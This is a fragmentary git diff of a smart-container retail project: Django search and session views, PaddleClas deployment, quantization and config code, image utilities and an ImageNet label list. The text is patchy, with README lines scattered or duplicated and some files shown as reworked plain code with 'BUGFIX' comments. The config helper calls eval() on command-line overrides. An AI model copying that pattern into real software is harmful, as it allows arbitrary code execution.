request.POST.get('isSKexpried') + code = request.POST.get('code') + + if isSKexpried: + sessionID = SKexpired(sessionID, code) + + container_all = information() + + return JsonResponse({"state": 'true', "sessionID": sessionID, 'container_all': container_all}) + else: + return JsonResponse({"state": 'false'}) + + +def find(request): #检索模块 + if request.method== "POST": + sessionID = request.POST.get('sessionID') + isSKexpried = request.POST.get('isSKexpried') + code = request.POST.get('code') + searchtarget = request.POST.get('searchtarget') + + container = models.TContainer.objects.all() + + + find_result = [] + for i in container: + + value = fuzz.partial_ratio("%s"%searchtarget,i.container_name) + + if value>=80: + temp = [] + temp.append(i.number) + temp.append(i.container_name) + temp.append(i.container_price) + temp.append(i.picture_address) + find_result.append(temp) + + return JsonResponse({"state": 'true', "sessionID": sessionID,"container_all":find_result}) + else: + return JsonResponse({"state": 'false'}) diff --git a/Smart_container/PaddleClas/deploy/shell/predict.sh b/Smart_container/PaddleClas/deploy/shell/predict.sh new file mode 100644 index 0000000..f0f59f4 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/shell/predict.sh @@ -0,0 +1,18 @@ +# classification +python3.7 python/predict_cls.py -c configs/inference_cls.yaml + +# multilabel_classification +#python3.7 python/predict_cls.py -c configs/inference_multilabel_cls.yaml + +# feature extractor +# python3.7 python/predict_rec.py -c configs/inference_rec.yaml + +# detection +# python3.7 python/predict_det.py -c configs/inference_rec.yaml + + +# build system +#python3.7 python/build_gallery.py -c configs/build_logo.yaml + +# inference system +# python3.7 python/predict_system.py -c configs/inference_logo.yaml diff --git a/Smart_container/PaddleClas/deploy/slim/README.md b/Smart_container/PaddleClas/deploy/slim/README.md new file mode 100644 index 0000000..eed8aa3 --- /dev/null +++ 
以CPU为例,若使用GPU,则将命令中的`cpu`改成`gpu`
以CPU为例,若使用GPU,则将命令中的`cpu`改成`gpu`
Generally, a more complex model would achieve better performance in the task, but it also leads to some redundancy in the model.
cd PaddleClas
+ -o Global.pretrained_model=./output/ResNet50_vd/best_model \
+* In quantitative training, it is suggested that the initial learning rate should be changed to `1 / 20 ~ 1 / 10` of the conventional training, and the training epoch number should be changed to `1 / 5 ~ 1 / 2` of the conventional training. In terms of learning rate strategy, it's better to train with warmup, other configuration information is not recommended to be changed. diff --git a/Smart_container/PaddleClas/deploy/slim/quant_post_static.py b/Smart_container/PaddleClas/deploy/slim/quant_post_static.py new file mode 100644 index 0000000..edab53d --- /dev/null +++ b/Smart_container/PaddleClas/deploy/slim/quant_post_static.py @@ -0,0 +1,74 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +from __future__ import absolute_import, division, print_function + +import os +import sys + +import numpy as np +import paddle +import paddleslim +from paddle.jit import to_static +from paddleslim.analysis import dygraph_flops as flops + +__dir__ = os.path.dirname(os.path.abspath(__file__)) +sys.path.append(os.path.abspath(os.path.join(__dir__, '../../'))) +from paddleslim.dygraph.quant import QAT + +from ppcls.data import build_dataloader +from ppcls.utils import config as conf +from ppcls.utils.logger import init_logger + + +def main(): + args = conf.parse_args() + config = conf.get_config(args.config, overrides=args.override, show=False) + + assert os.path.exists( + os.path.join(config["Global"]["save_inference_dir"], + 'inference.pdmodel')) and os.path.exists( + os.path.join(config["Global"]["save_inference_dir"], + 'inference.pdiparams')) + config["DataLoader"]["Train"]["sampler"]["batch_size"] = 1 + config["DataLoader"]["Train"]["loader"]["num_workers"] = 0 + init_logger() + device = paddle.set_device("cpu") + train_dataloader = build_dataloader(config["DataLoader"], "Train", device, + False) + + def sample_generator(loader): + def __reader__(): + for indx, data in enumerate(loader): + images = np.array(data[0]) + yield images + + return __reader__ + + paddle.enable_static() + place = paddle.CPUPlace() + exe = paddle.static.Executor(place) + paddleslim.quant.quant_post_static( + executor=exe, + model_dir=config["Global"]["save_inference_dir"], + model_filename='inference.pdmodel', + params_filename='inference.pdiparams', + quantize_model_path=os.path.join( + config["Global"]["save_inference_dir"], "quant_post_static_model"), + sample_generator=sample_generator(train_dataloader), + batch_nums=10) + + +if __name__ == "__main__": + main() diff --git a/Smart_container/PaddleClas/deploy/utils/__init__.py b/Smart_container/PaddleClas/deploy/utils/__init__.py new file mode 100644 index 0000000..baf14a9 --- /dev/null +++ 
b/Smart_container/PaddleClas/deploy/utils/__init__.py @@ -0,0 +1,5 @@ +from . import logger +from . import config +from . import get_image_list +from . import predictor +from . import encode_decode \ No newline at end of file diff --git a/Smart_container/PaddleClas/deploy/utils/config.py b/Smart_container/PaddleClas/deploy/utils/config.py new file mode 100644 index 0000000..eb79148 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/utils/config.py @@ -0,0 +1,197 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +import os +import copy +import argparse +import yaml + +from utils import logger + +__all__ = ['get_config'] + + +class AttrDict(dict): + def __getattr__(self, key): + return self[key] + + def __setattr__(self, key, value): + if key in self.__dict__: + self.__dict__[key] = value + else: + self[key] = value + + def __deepcopy__(self, content): + return copy.deepcopy(dict(self)) + + +def create_attr_dict(yaml_config): + from ast import literal_eval + for key, value in yaml_config.items(): + if type(value) is dict: + yaml_config[key] = value = AttrDict(value) + if isinstance(value, str): + try: + value = literal_eval(value) + except BaseException: + pass + if isinstance(value, AttrDict): + create_attr_dict(yaml_config[key]) + else: + yaml_config[key] = value + + +def parse_config(cfg_file): + """Load a config file into AttrDict""" + with open(cfg_file, 'r') as fopen: + yaml_config = AttrDict(yaml.load(fopen, Loader=yaml.SafeLoader)) + create_attr_dict(yaml_config) + return yaml_config + + +def print_dict(d, delimiter=0): + """ + Recursively visualize a dict and + indenting acrrording by the relationship of keys. 
+ """ + placeholder = "-" * 60 + for k, v in sorted(d.items()): + if isinstance(v, dict): + logger.info("{}{} : ".format(delimiter * " ", + logger.coloring(k, "HEADER"))) + print_dict(v, delimiter + 4) + elif isinstance(v, list) and len(v) >= 1 and isinstance(v[0], dict): + logger.info("{}{} : ".format(delimiter * " ", + logger.coloring(str(k), "HEADER"))) + for value in v: + print_dict(value, delimiter + 4) + else: + logger.info("{}{} : {}".format(delimiter * " ", + logger.coloring(k, "HEADER"), + logger.coloring(v, "OKGREEN"))) + if k.isupper(): + logger.info(placeholder) + + +def print_config(config): + """ + visualize configs + Arguments: + config: configs + """ + logger.advertise() + print_dict(config) + + +def override(dl, ks, v): + """ + Recursively replace dict of list + Args: + dl(dict or list): dict or list to be replaced + ks(list): list of keys + v(str): value to be replaced + """ + + def str2num(v): + try: + return eval(v) + except Exception: + return v + + assert isinstance(dl, (list, dict)), ("{} should be a list or a dict") + assert len(ks) > 0, ('lenght of keys should larger than 0') + if isinstance(dl, list): + k = str2num(ks[0]) + if len(ks) == 1: + assert k < len(dl), ('index({}) out of range({})'.format(k, dl)) + dl[k] = str2num(v) + else: + override(dl[k], ks[1:], v) + else: + if len(ks) == 1: + # assert ks[0] in dl, ('{} is not exist in {}'.format(ks[0], dl)) + if not ks[0] in dl: + logger.warning('A new filed ({}) detected!'.format(ks[0], dl)) + dl[ks[0]] = str2num(v) + else: + override(dl[ks[0]], ks[1:], v) + + +def override_config(config, options=None): + """ + Recursively override the config + Args: + config(dict): dict to be replaced + options(list): list of pairs(key0.key1.idx.key2=value) + such as: [ + 'topk=2', + 'VALID.transforms.1.ResizeImage.resize_short=300' + ] + Returns: + config(dict): replaced config + """ + if options is not None: + for opt in options: + assert isinstance(opt, str), ( + "option({}) should be a 
str".format(opt)) + assert "=" in opt, ( + "option({}) should contain a =" + "to distinguish between key and value".format(opt)) + pair = opt.split('=') + assert len(pair) == 2, ("there can be only a = in the option") + key, value = pair + keys = key.split('.') + override(config, keys, value) + return config + + +def get_config(fname, overrides=None, show=True): + """ + Read config from file + """ + assert os.path.exists(fname), ( + 'config file({}) is not exist'.format(fname)) + config = parse_config(fname) + override_config(config, overrides) + if show: + print_config(config) + # check_config(config) + return config + + +def parser(): + parser = argparse.ArgumentParser("generic-image-rec train script") + parser.add_argument( + '-c', + '--config', + type=str, + default='configs/config.yaml', + help='config file path') + parser.add_argument( + '-o', + '--override', + action='append', + default=[], + help='config options to be overridden') + parser.add_argument( + '-v', + '--verbose', + action='store_true', + help='wheather print the config info') + return parser + + +def parse_args(): + args = parser().parse_args() + return args diff --git a/Smart_container/PaddleClas/deploy/utils/draw_bbox.py b/Smart_container/PaddleClas/deploy/utils/draw_bbox.py new file mode 100644 index 0000000..3b61ad4 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/utils/draw_bbox.py @@ -0,0 +1,62 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
import os

import cv2
import numpy as np
from PIL import Image, ImageDraw, ImageFont


def draw_bbox_results(image,
                      results,
                      input_path,
                      font_path="/root/Smart_container/PaddleClas/deploy/utils/simfang.ttf",
                      save_dir=None):
    """Draw detection boxes plus recognition labels on an image and save it.

    Args:
        image (np.ndarray or PIL.Image.Image): image to draw on.
        results (list[dict]): each dict needs "bbox" (xmin, ymin, xmax,
            ymax), "rec_docs" (label text or None) and "rec_scores".
        input_path (str): source image path; its basename names the output.
        font_path (str): TrueType font used for the label text.
        save_dir (str): output directory; defaults to "output".

    Returns:
        np.ndarray: the annotated image.
    """
    if isinstance(image, np.ndarray):
        image = Image.fromarray(image)
    draw = ImageDraw.Draw(image)
    font_size = 48
    font = ImageFont.truetype(font_path, font_size, encoding="utf-8")

    color = (0, 102, 255)

    for result in results:
        # Skip detections that produced no recognition result.
        if result["rec_docs"] is None:
            continue

        xmin, ymin, xmax, ymax = result["bbox"]
        text = "{}, {:.2f}".format(result["rec_docs"], result["rec_scores"])
        th = font_size
        # BUGFIX: font.getsize() was deprecated in Pillow 9.2 and removed
        # in Pillow 10; prefer getlength() (Pillow >= 8) with a fallback
        # for very old Pillow versions.
        try:
            tw = int(font.getlength(text))
        except AttributeError:
            tw = font.getsize(text)[0]
        # Keep the label readable when the box touches the top of the image.
        start_y = max(0, ymin - th)

        draw.rectangle(
            [(xmin + 1, start_y), (xmin + tw + 1, start_y + th)], fill=color)

        draw.text((xmin + 4, start_y), text, fill=(255, 255, 255), font=font)

        draw.rectangle(
            [(xmin, ymin), (xmax, ymax)], outline=(255, 0, 0), width=6)

    image_name = os.path.basename(input_path)
    if save_dir is None:
        save_dir = "output"
    os.makedirs(save_dir, exist_ok=True)
    output_path = os.path.join(save_dir, image_name)

    image.save(output_path, quality=95)
    return np.array(image)
import base64

import numpy as np


def np_to_b64(images):
    """Encode a numpy array's raw bytes as a base64 string.

    Args:
        images (np.ndarray): array to encode.

    Returns:
        tuple: (base64 str, original array shape) — the shape is needed by
        ``b64_to_np`` to rebuild the array.
    """
    img_str = base64.b64encode(images).decode('utf8')
    return img_str, images.shape


def b64_to_np(b64str, revert_params):
    """Decode a base64 string produced by ``np_to_b64`` back to an array.

    Args:
        b64str (str): base64-encoded raw array bytes.
        revert_params (dict): {"shape": ..., "dtype": ...}; dtype may be a
            numpy dtype or its string name (e.g. "uint8").

    Returns:
        np.ndarray: writable array with the requested shape and dtype.
    """
    shape = revert_params["shape"]
    dtype = revert_params["dtype"]
    # BUGFIX(idiom): isinstance(dtype, str), not isinstance(str, type(dtype)).
    dtype = getattr(np, dtype) if isinstance(dtype, str) else dtype
    data = base64.b64decode(b64str.encode('utf8'))
    # BUGFIX: np.fromstring is deprecated; np.frombuffer returns a
    # read-only view of the decoded bytes, so copy to keep the original
    # writable-array behavior.
    data = np.frombuffer(data, dtype).copy().reshape(shape)
    return data
import os
import argparse
import base64
import numpy as np


def get_image_list(img_file):
    """Collect image paths from a single file or a directory.

    Args:
        img_file (str): path to an image file or a directory of images.

    Returns:
        list[str]: sorted list of image paths.

    Raises:
        Exception: when the path is missing or contains no images.
    """
    imgs_lists = []
    if img_file is None or not os.path.exists(img_file):
        raise Exception("not found any img file in {}".format(img_file))

    # Extension check is case-insensitive, which also covers variants such
    # as .BMP/.Png that the previous hard-coded list missed.
    img_end = ('jpg', 'png', 'jpeg', 'bmp')
    if os.path.isfile(img_file) and img_file.split('.')[-1].lower() in img_end:
        imgs_lists.append(img_file)
    elif os.path.isdir(img_file):
        for single_file in os.listdir(img_file):
            if single_file.split('.')[-1].lower() in img_end:
                imgs_lists.append(os.path.join(img_file, single_file))
    if len(imgs_lists) == 0:
        raise Exception("not found any img file in {}".format(img_file))
    return sorted(imgs_lists)


def get_image_list_from_label_file(image_path, label_file_path):
    """Read "<image_name> <label>" lines from a label file.

    Args:
        image_path (str): directory prefixed to each image name.
        label_file_path (str): whitespace-separated label file path.

    Returns:
        tuple: (list of image paths, list of int ground-truth labels).
    """
    imgs_lists = []
    gt_labels = []
    with open(label_file_path, "r") as fin:
        for line in fin:
            image_name, label = line.strip("\n").split()
            imgs_lists.append(os.path.join(image_path, image_name))
            # int() once is enough (the original converted twice).
            gt_labels.append(int(label))
    return imgs_lists, gt_labels
chickadee +20 water ouzel, dipper +21 kite +22 bald eagle, American eagle, Haliaeetus leucocephalus +23 vulture +24 great grey owl, great gray owl, Strix nebulosa +25 European fire salamander, Salamandra salamandra +26 common newt, Triturus vulgaris +27 eft +28 spotted salamander, Ambystoma maculatum +29 axolotl, mud puppy, Ambystoma mexicanum +30 bullfrog, Rana catesbeiana +31 tree frog, tree-frog +32 tailed frog, bell toad, ribbed toad, tailed toad, Ascaphus trui +33 loggerhead, loggerhead turtle, Caretta caretta +34 leatherback turtle, leatherback, leathery turtle, Dermochelys coriacea +35 mud turtle +36 terrapin +37 box turtle, box tortoise +38 banded gecko +39 common iguana, iguana, Iguana iguana +40 American chameleon, anole, Anolis carolinensis +41 whiptail, whiptail lizard +42 agama +43 frilled lizard, Chlamydosaurus kingi +44 alligator lizard +45 Gila monster, Heloderma suspectum +46 green lizard, Lacerta viridis +47 African chameleon, Chamaeleo chamaeleon +48 Komodo dragon, Komodo lizard, dragon lizard, giant lizard, Varanus komodoensis +49 African crocodile, Nile crocodile, Crocodylus niloticus +50 American alligator, Alligator mississipiensis +51 triceratops +52 thunder snake, worm snake, Carphophis amoenus +53 ringneck snake, ring-necked snake, ring snake +54 hognose snake, puff adder, sand viper +55 green snake, grass snake +56 king snake, kingsnake +57 garter snake, grass snake +58 water snake +59 vine snake +60 night snake, Hypsiglena torquata +61 boa constrictor, Constrictor constrictor +62 rock python, rock snake, Python sebae +63 Indian cobra, Naja naja +64 green mamba +65 sea snake +66 horned viper, cerastes, sand viper, horned asp, Cerastes cornutus +67 diamondback, diamondback rattlesnake, Crotalus adamanteus +68 sidewinder, horned rattlesnake, Crotalus cerastes +69 trilobite +70 harvestman, daddy longlegs, Phalangium opilio +71 scorpion +72 black and gold garden spider, Argiope aurantia +73 barn spider, Araneus cavaticus +74 garden spider, 
Aranea diademata +75 black widow, Latrodectus mactans +76 tarantula +77 wolf spider, hunting spider +78 tick +79 centipede +80 black grouse +81 ptarmigan +82 ruffed grouse, partridge, Bonasa umbellus +83 prairie chicken, prairie grouse, prairie fowl +84 peacock +85 quail +86 partridge +87 African grey, African gray, Psittacus erithacus +88 macaw +89 sulphur-crested cockatoo, Kakatoe galerita, Cacatua galerita +90 lorikeet +91 coucal +92 bee eater +93 hornbill +94 hummingbird +95 jacamar +96 toucan +97 drake +98 red-breasted merganser, Mergus serrator +99 goose +100 black swan, Cygnus atratus +101 tusker +102 echidna, spiny anteater, anteater +103 platypus, duckbill, duckbilled platypus, duck-billed platypus, Ornithorhynchus anatinus +104 wallaby, brush kangaroo +105 koala, koala bear, kangaroo bear, native bear, Phascolarctos cinereus +106 wombat +107 jellyfish +108 sea anemone, anemone +109 brain coral +110 flatworm, platyhelminth +111 nematode, nematode worm, roundworm +112 conch +113 snail +114 slug +115 sea slug, nudibranch +116 chiton, coat-of-mail shell, sea cradle, polyplacophore +117 chambered nautilus, pearly nautilus, nautilus +118 Dungeness crab, Cancer magister +119 rock crab, Cancer irroratus +120 fiddler crab +121 king crab, Alaska crab, Alaskan king crab, Alaska king crab, Paralithodes camtschatica +122 American lobster, Northern lobster, Maine lobster, Homarus americanus +123 spiny lobster, langouste, rock lobster, crawfish, crayfish, sea crawfish +124 crayfish, crawfish, crawdad, crawdaddy +125 hermit crab +126 isopod +127 white stork, Ciconia ciconia +128 black stork, Ciconia nigra +129 spoonbill +130 flamingo +131 little blue heron, Egretta caerulea +132 American egret, great white heron, Egretta albus +133 bittern +134 crane +135 limpkin, Aramus pictus +136 European gallinule, Porphyrio porphyrio +137 American coot, marsh hen, mud hen, water hen, Fulica americana +138 bustard +139 ruddy turnstone, Arenaria interpres +140 red-backed sandpiper, 
dunlin, Erolia alpina +141 redshank, Tringa totanus +142 dowitcher +143 oystercatcher, oyster catcher +144 pelican +145 king penguin, Aptenodytes patagonica +146 albatross, mollymawk +147 grey whale, gray whale, devilfish, Eschrichtius gibbosus, Eschrichtius robustus +148 killer whale, killer, orca, grampus, sea wolf, Orcinus orca +149 dugong, Dugong dugon +150 sea lion +151 Chihuahua +152 Japanese spaniel +153 Maltese dog, Maltese terrier, Maltese +154 Pekinese, Pekingese, Peke +155 Shih-Tzu +156 Blenheim spaniel +157 papillon +158 toy terrier +159 Rhodesian ridgeback +160 Afghan hound, Afghan +161 basset, basset hound +162 beagle +163 bloodhound, sleuthhound +164 bluetick +165 black-and-tan coonhound +166 Walker hound, Walker foxhound +167 English foxhound +168 redbone +169 borzoi, Russian wolfhound +170 Irish wolfhound +171 Italian greyhound +172 whippet +173 Ibizan hound, Ibizan Podenco +174 Norwegian elkhound, elkhound +175 otterhound, otter hound +176 Saluki, gazelle hound +177 Scottish deerhound, deerhound +178 Weimaraner +179 Staffordshire bullterrier, Staffordshire bull terrier +180 American Staffordshire terrier, Staffordshire terrier, American pit bull terrier, pit bull terrier +181 Bedlington terrier +182 Border terrier +183 Kerry blue terrier +184 Irish terrier +185 Norfolk terrier +186 Norwich terrier +187 Yorkshire terrier +188 wire-haired fox terrier +189 Lakeland terrier +190 Sealyham terrier, Sealyham +191 Airedale, Airedale terrier +192 cairn, cairn terrier +193 Australian terrier +194 Dandie Dinmont, Dandie Dinmont terrier +195 Boston bull, Boston terrier +196 miniature schnauzer +197 giant schnauzer +198 standard schnauzer +199 Scotch terrier, Scottish terrier, Scottie +200 Tibetan terrier, chrysanthemum dog +201 silky terrier, Sydney silky +202 soft-coated wheaten terrier +203 West Highland white terrier +204 Lhasa, Lhasa apso +205 flat-coated retriever +206 curly-coated retriever +207 golden retriever +208 Labrador retriever +209 Chesapeake 
Bay retriever +210 German short-haired pointer +211 vizsla, Hungarian pointer +212 English setter +213 Irish setter, red setter +214 Gordon setter +215 Brittany spaniel +216 clumber, clumber spaniel +217 English springer, English springer spaniel +218 Welsh springer spaniel +219 cocker spaniel, English cocker spaniel, cocker +220 Sussex spaniel +221 Irish water spaniel +222 kuvasz +223 schipperke +224 groenendael +225 malinois +226 briard +227 kelpie +228 komondor +229 Old English sheepdog, bobtail +230 Shetland sheepdog, Shetland sheep dog, Shetland +231 collie +232 Border collie +233 Bouvier des Flandres, Bouviers des Flandres +234 Rottweiler +235 German shepherd, German shepherd dog, German police dog, alsatian +236 Doberman, Doberman pinscher +237 miniature pinscher +238 Greater Swiss Mountain dog +239 Bernese mountain dog +240 Appenzeller +241 EntleBucher +242 boxer +243 bull mastiff +244 Tibetan mastiff +245 French bulldog +246 Great Dane +247 Saint Bernard, St Bernard +248 Eskimo dog, husky +249 malamute, malemute, Alaskan malamute +250 Siberian husky +251 dalmatian, coach dog, carriage dog +252 affenpinscher, monkey pinscher, monkey dog +253 basenji +254 pug, pug-dog +255 Leonberg +256 Newfoundland, Newfoundland dog +257 Great Pyrenees +258 Samoyed, Samoyede +259 Pomeranian +260 chow, chow chow +261 keeshond +262 Brabancon griffon +263 Pembroke, Pembroke Welsh corgi +264 Cardigan, Cardigan Welsh corgi +265 toy poodle +266 miniature poodle +267 standard poodle +268 Mexican hairless +269 timber wolf, grey wolf, gray wolf, Canis lupus +270 white wolf, Arctic wolf, Canis lupus tundrarum +271 red wolf, maned wolf, Canis rufus, Canis niger +272 coyote, prairie wolf, brush wolf, Canis latrans +273 dingo, warrigal, warragal, Canis dingo +274 dhole, Cuon alpinus +275 African hunting dog, hyena dog, Cape hunting dog, Lycaon pictus +276 hyena, hyaena +277 red fox, Vulpes vulpes +278 kit fox, Vulpes macrotis +279 Arctic fox, white fox, Alopex lagopus +280 grey fox, 
gray fox, Urocyon cinereoargenteus +281 tabby, tabby cat +282 tiger cat +283 Persian cat +284 Siamese cat, Siamese +285 Egyptian cat +286 cougar, puma, catamount, mountain lion, painter, panther, Felis concolor +287 lynx, catamount +288 leopard, Panthera pardus +289 snow leopard, ounce, Panthera uncia +290 jaguar, panther, Panthera onca, Felis onca +291 lion, king of beasts, Panthera leo +292 tiger, Panthera tigris +293 cheetah, chetah, Acinonyx jubatus +294 brown bear, bruin, Ursus arctos +295 American black bear, black bear, Ursus americanus, Euarctos americanus +296 ice bear, polar bear, Ursus Maritimus, Thalarctos maritimus +297 sloth bear, Melursus ursinus, Ursus ursinus +298 mongoose +299 meerkat, mierkat +300 tiger beetle +301 ladybug, ladybeetle, lady beetle, ladybird, ladybird beetle +302 ground beetle, carabid beetle +303 long-horned beetle, longicorn, longicorn beetle +304 leaf beetle, chrysomelid +305 dung beetle +306 rhinoceros beetle +307 weevil +308 fly +309 bee +310 ant, emmet, pismire +311 grasshopper, hopper +312 cricket +313 walking stick, walkingstick, stick insect +314 cockroach, roach +315 mantis, mantid +316 cicada, cicala +317 leafhopper +318 lacewing, lacewing fly +319 dragonfly, darning needle, devil's darning needle, sewing needle, snake feeder, snake doctor, mosquito hawk, skeeter hawk +320 damselfly +321 admiral +322 ringlet, ringlet butterfly +323 monarch, monarch butterfly, milkweed butterfly, Danaus plexippus +324 cabbage butterfly +325 sulphur butterfly, sulfur butterfly +326 lycaenid, lycaenid butterfly +327 starfish, sea star +328 sea urchin +329 sea cucumber, holothurian +330 wood rabbit, cottontail, cottontail rabbit +331 hare +332 Angora, Angora rabbit +333 hamster +334 porcupine, hedgehog +335 fox squirrel, eastern fox squirrel, Sciurus niger +336 marmot +337 beaver +338 guinea pig, Cavia cobaya +339 sorrel +340 zebra +341 hog, pig, grunter, squealer, Sus scrofa +342 wild boar, boar, Sus scrofa +343 warthog +344 hippopotamus, 
hippo, river horse, Hippopotamus amphibius +345 ox +346 water buffalo, water ox, Asiatic buffalo, Bubalus bubalis +347 bison +348 ram, tup +349 bighorn, bighorn sheep, cimarron, Rocky Mountain bighorn, Rocky Mountain sheep, Ovis canadensis +350 ibex, Capra ibex +351 hartebeest +352 impala, Aepyceros melampus +353 gazelle +354 Arabian camel, dromedary, Camelus dromedarius +355 llama +356 weasel +357 mink +358 polecat, fitch, foulmart, foumart, Mustela putorius +359 black-footed ferret, ferret, Mustela nigripes +360 otter +361 skunk, polecat, wood pussy +362 badger +363 armadillo +364 three-toed sloth, ai, Bradypus tridactylus +365 orangutan, orang, orangutang, Pongo pygmaeus +366 gorilla, Gorilla gorilla +367 chimpanzee, chimp, Pan troglodytes +368 gibbon, Hylobates lar +369 siamang, Hylobates syndactylus, Symphalangus syndactylus +370 guenon, guenon monkey +371 patas, hussar monkey, Erythrocebus patas +372 baboon +373 macaque +374 langur +375 colobus, colobus monkey +376 proboscis monkey, Nasalis larvatus +377 marmoset +378 capuchin, ringtail, Cebus capucinus +379 howler monkey, howler +380 titi, titi monkey +381 spider monkey, Ateles geoffroyi +382 squirrel monkey, Saimiri sciureus +383 Madagascar cat, ring-tailed lemur, Lemur catta +384 indri, indris, Indri indri, Indri brevicaudatus +385 Indian elephant, Elephas maximus +386 African elephant, Loxodonta africana +387 lesser panda, red panda, panda, bear cat, cat bear, Ailurus fulgens +388 giant panda, panda, panda bear, coon bear, Ailuropoda melanoleuca +389 barracouta, snoek +390 eel +391 coho, cohoe, coho salmon, blue jack, silver salmon, Oncorhynchus kisutch +392 rock beauty, Holocanthus tricolor +393 anemone fish +394 sturgeon +395 gar, garfish, garpike, billfish, Lepisosteus osseus +396 lionfish +397 puffer, pufferfish, blowfish, globefish +398 abacus +399 abaya +400 academic gown, academic robe, judge's robe +401 accordion, piano accordion, squeeze box +402 acoustic guitar +403 aircraft carrier, carrier, 
flattop, attack aircraft carrier +404 airliner +405 airship, dirigible +406 altar +407 ambulance +408 amphibian, amphibious vehicle +409 analog clock +410 apiary, bee house +411 apron +412 ashcan, trash can, garbage can, wastebin, ash bin, ash-bin, ashbin, dustbin, trash barrel, trash bin +413 assault rifle, assault gun +414 backpack, back pack, knapsack, packsack, rucksack, haversack +415 bakery, bakeshop, bakehouse +416 balance beam, beam +417 balloon +418 ballpoint, ballpoint pen, ballpen, Biro +419 Band Aid +420 banjo +421 bannister, banister, balustrade, balusters, handrail +422 barbell +423 barber chair +424 barbershop +425 barn +426 barometer +427 barrel, cask +428 barrow, garden cart, lawn cart, wheelbarrow +429 baseball +430 basketball +431 bassinet +432 bassoon +433 bathing cap, swimming cap +434 bath towel +435 bathtub, bathing tub, bath, tub +436 beach wagon, station wagon, wagon, estate car, beach waggon, station waggon, waggon +437 beacon, lighthouse, beacon light, pharos +438 beaker +439 bearskin, busby, shako +440 beer bottle +441 beer glass +442 bell cote, bell cot +443 bib +444 bicycle-built-for-two, tandem bicycle, tandem +445 bikini, two-piece +446 binder, ring-binder +447 binoculars, field glasses, opera glasses +448 birdhouse +449 boathouse +450 bobsled, bobsleigh, bob +451 bolo tie, bolo, bola tie, bola +452 bonnet, poke bonnet +453 bookcase +454 bookshop, bookstore, bookstall +455 bottlecap +456 bow +457 bow tie, bow-tie, bowtie +458 brass, memorial tablet, plaque +459 brassiere, bra, bandeau +460 breakwater, groin, groyne, mole, bulwark, seawall, jetty +461 breastplate, aegis, egis +462 broom +463 bucket, pail +464 buckle +465 bulletproof vest +466 bullet train, bullet +467 butcher shop, meat market +468 cab, hack, taxi, taxicab +469 caldron, cauldron +470 candle, taper, wax light +471 cannon +472 canoe +473 can opener, tin opener +474 cardigan +475 car mirror +476 carousel, carrousel, merry-go-round, roundabout, whirligig +477 carpenter's 
kit, tool kit +478 carton +479 car wheel +480 cash machine, cash dispenser, automated teller machine, automatic teller machine, automated teller, automatic teller, ATM +481 cassette +482 cassette player +483 castle +484 catamaran +485 CD player +486 cello, violoncello +487 cellular telephone, cellular phone, cellphone, cell, mobile phone +488 chain +489 chainlink fence +490 chain mail, ring mail, mail, chain armor, chain armour, ring armor, ring armour +491 chain saw, chainsaw +492 chest +493 chiffonier, commode +494 chime, bell, gong +495 china cabinet, china closet +496 Christmas stocking +497 church, church building +498 cinema, movie theater, movie theatre, movie house, picture palace +499 cleaver, meat cleaver, chopper +500 cliff dwelling +501 cloak +502 clog, geta, patten, sabot +503 cocktail shaker +504 coffee mug +505 coffeepot +506 coil, spiral, volute, whorl, helix +507 combination lock +508 computer keyboard, keypad +509 confectionery, confectionary, candy store +510 container ship, containership, container vessel +511 convertible +512 corkscrew, bottle screw +513 cornet, horn, trumpet, trump +514 cowboy boot +515 cowboy hat, ten-gallon hat +516 cradle +517 crane +518 crash helmet +519 crate +520 crib, cot +521 Crock Pot +522 croquet ball +523 crutch +524 cuirass +525 dam, dike, dyke +526 desk +527 desktop computer +528 dial telephone, dial phone +529 diaper, nappy, napkin +530 digital clock +531 digital watch +532 dining table, board +533 dishrag, dishcloth +534 dishwasher, dish washer, dishwashing machine +535 disk brake, disc brake +536 dock, dockage, docking facility +537 dogsled, dog sled, dog sleigh +538 dome +539 doormat, welcome mat +540 drilling platform, offshore rig +541 drum, membranophone, tympan +542 drumstick +543 dumbbell +544 Dutch oven +545 electric fan, blower +546 electric guitar +547 electric locomotive +548 entertainment center +549 envelope +550 espresso maker +551 face powder +552 feather boa, boa +553 file, file cabinet, filing 
